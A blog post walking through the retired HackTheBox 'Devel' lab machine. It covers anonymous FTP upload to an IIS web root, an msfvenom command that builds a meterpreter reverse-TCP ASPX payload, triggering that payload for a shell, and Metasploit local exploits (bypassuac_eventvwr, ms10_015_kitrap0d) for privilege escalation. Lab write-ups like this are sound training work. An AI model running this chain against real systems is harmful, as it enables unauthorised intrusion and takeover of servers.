DEV Community

Ari Kalfus
Ari Kalfus

Posted on • Originally published at on

Writeup: HackTheBox Devel - with Metasploit

This series will follow my exercises in HackTheBox.
All published writeups are for retired HTB machines.
Whether or not I use Metasploit to pwn the server will be indicated in the title.


Difficulty: Easy

Machine IP:

As always, I start enumeration with AutoRecon. The open ports are TCP/21 and TCP/80. While AutoRecon continues scanning, I look into the FTP server. It allows anonymous login! I note that in my mind map and leave it for now to check on the results of AutoRecon.

I look at what the nmap HTTP script scan found:


At the bottom of the results, I see a CVE was found:


I see this CVE is tied to MS-15-034 and run that through searchsploit:


I take a look at the C exploit:


I see that the main body of the payload is simply running a validation on whether the target is vulnerable to this CVE.


Well, that would still be useful so let's compile and execute the code:


Great. Now what?

I back off and take another look at my enumeration results. I know this is a Windows machine because the server at TCP/80 is running IIS. I know it has a CVE. I know that I have anonymous access via FTP to the server, to a directory that appears to host the web server's files.

Ah. Ok.

Let's generate a reverse TCP meterpreter payload with msfvenom, push it to the target via FTP, then call it from the web server to execute and establish a shell back to my box.

The payload command is:

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f aspx > devel.aspx
Enter fullscreen mode Exit fullscreen mode

Substitute the LHOST and LPORT as applicable for your system.

I can now push the file via FTP with put:

# anonymous login
> put ./devel.aspx
Enter fullscreen mode Exit fullscreen mode

Then I need to start a meterpreter handler on my machine listening on LPORT.

sudo msfconsole
msf> workspace htb
msf> use windows/meterpreter/reverse_tcp
Enter fullscreen mode Exit fullscreen mode

I just need to set my local IP:


Then I can set up a local listener by converting this to a handler:


I can now execute my payload with a curl command:

Enter fullscreen mode Exit fullscreen mode

Meterpreter records the session (ignore the whoami -> root command, I was confused on what terminal I was in):


I can now connect to the session I've created:


Now let's gather information on the system and check what user I am:


Ok, this is a Windows 7 machine with x86 architecture. I am logged in as the IIS user, which isn't going to give me much. I can't even write to my current directory. But, I should be able to write to C:\Windows\TEMP. I navigate over to there and then use local_exploit_suggestor to suggest some exploit modules I can run to elevate my shell to administrator.


The machine seems to be vulnerable to exploit/windows/local/bypassuac_eventvwr - let's try that.

It is unsuccessful, as my IIS user isn't in the Administrators group. On to the next.


The second exploit, exploit/windows/local/ms10_015_kitrap0d is successful.


I can now go and retrieve the user and root flags.



Top comments (0)